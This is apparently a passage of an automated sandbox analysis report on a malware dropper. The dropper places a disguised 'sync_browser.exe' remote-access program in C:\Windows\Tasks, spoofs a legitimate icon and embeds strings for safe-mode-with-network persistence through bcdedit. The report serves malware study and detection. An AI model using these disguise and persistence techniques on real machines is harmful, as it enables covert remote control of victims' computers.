Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E07F8 push rbp; iretd	22_2_00007FF67E7E07F9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7CFEF1 push rcx; ret	22_2_00007FF67E7CFEF2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DDC01 push rcx; ret	22_2_00007FF67E7DDC02
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E1400 push rbp; iretd	22_2_00007FF67E7E1401
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DDC11 push rax; ret	22_2_00007FF67E7DDC13
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7DDC21 push rsp; ret	22_2_00007FF67E7DDC23
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F8CF9 push 8B481074h; iretd	22_2_00007FF67E7F8CFF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7E12EF push rbp; iretd	22_2_00007FF67E7E12F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E07F8 push rbp; iretd	25_2_00007FF67E7E07F9
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7CFEF1 push rcx; ret	25_2_00007FF67E7CFEF2
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DDC01 push rcx; ret	25_2_00007FF67E7DDC02
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E1400 push rbp; iretd	25_2_00007FF67E7E1401
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DDC11 push rax; ret	25_2_00007FF67E7DDC13
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7DDC21 push rsp; ret	25_2_00007FF67E7DDC23
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F8CF9 push 8B481074h; iretd	25_2_00007FF67E7F8CFF
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7E12EF push rbp; iretd	25_2_00007FF67E7E12F0

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\SysWOW64\cmd.exe

Executable created and started: C:\Windows\Tasks\sync_browser.exe

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\WPSela.LSZr7V	Jump to dropped file
Source: C:\Users\user\Desktop\7q551ugrWe.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Nfe70s.UFVVkM	Jump to dropped file
Source: C:\Users\user\Desktop\7q551ugrWe.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sync_browser.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\WPSela.LSZr7V	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Nfe70s.UFVVkM	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sync_browser.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Users\user\Desktop\7q551ugrWe.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Nfe70s.UFVVkM	Jump to dropped file
Source: C:\Users\user\Desktop\7q551ugrWe.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\id2rlx.MxYNRd	Jump to dropped file
Source: C:\Users\user\Desktop\7q551ugrWe.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\id2rlx.MxYNRd	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\Nfe70s.UFVVkM	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\WPSela.LSZr7V	Jump to dropped file

Source: sync_browser.exe.6.dr	Binary or memory string: bcdedit.exe
Source: sync_browser.exe.6.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: WPSela.LSZr7V.2.dr	Binary or memory string: bcdedit.exe
Source: WPSela.LSZr7V.2.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: WPSela.LSZr7V.0.dr	Binary or memory string: bcdedit.exe
Source: WPSela.LSZr7V.0.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E8177F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,	22_2_00007FF67E8177F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E817750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,	22_2_00007FF67E817750
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E817F50 GetPrivateProfileIntA,	22_2_00007FF67E817F50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E8178E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,	22_2_00007FF67E8178E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E817E10 GetPrivateProfileIntA,	22_2_00007FF67E817E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E817D50 GetPrivateProfileIntA,	22_2_00007FF67E817D50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E817650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,	22_2_00007FF67E817650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E817EB0 GetPrivateProfileIntA,	22_2_00007FF67E817EB0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E817BD0 GetPrivateProfileIntA,	22_2_00007FF67E817BD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E817C90 GetPrivateProfileIntA,	22_2_00007FF67E817C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7CE1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat	22_2_00007FF67E7CE1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7C81AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin	22_2_00007FF67E7C81AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E819A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,	22_2_00007FF67E819A40
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E8177F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,	25_2_00007FF67E8177F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E817750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,	25_2_00007FF67E817750
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E817F50 GetPrivateProfileIntA,	25_2_00007FF67E817F50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E8178E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,	25_2_00007FF67E8178E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E817E10 GetPrivateProfileIntA,	25_2_00007FF67E817E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E817D50 GetPrivateProfileIntA,	25_2_00007FF67E817D50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E817650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,	25_2_00007FF67E817650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E817EB0 GetPrivateProfileIntA,	25_2_00007FF67E817EB0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E817BD0 GetPrivateProfileIntA,	25_2_00007FF67E817BD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E817C90 GetPrivateProfileIntA,	25_2_00007FF67E817C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7CE1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat	25_2_00007FF67E7CE1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7C81AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin	25_2_00007FF67E7C81AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E819A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,	25_2_00007FF67E819A40

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\0271695705143540

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (98).png

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 22_2_00007FF67E7F48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,		22_2_00007FF67E7F48B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 25_2_00007FF67E7F48B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,		25_2_00007FF67E7F48B0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 22_2_00007FF67E7F3E20 OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,LoadLibraryA,GetProcAddress,GetStockObject,RegisterClassExA,SetEvent,CreateWindowExA,SetTimer,SetWindowLongPtrA,SetClipboardViewer,CreateThread,CloseHandle,GetModuleFileNameA,GetModuleFileNameA,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetEvent,PeekMessageA,Sleep,CreateRectRgn,CombineRgn,DeleteObject,free,SetEvent,SetEvent,SetEvent,TranslateMessage,DispatchMessageA,WaitMessage,DestroyWindow,DestroyWindow,SetEvent,KillTimer,FreeLibrary,FreeLibrary,FreeLibrary,SetThreadDesktop,CloseDesktop,

22_2_00007FF67E7F3E20

Source: C:\Users\user\Desktop\7q551ugrWe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Tasks\sync_browser.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\sync_browser.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\Tasks\sync_browser.exe

22_2_00007FF67E829BC0

Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,		22_2_00007FF67E7C9D00
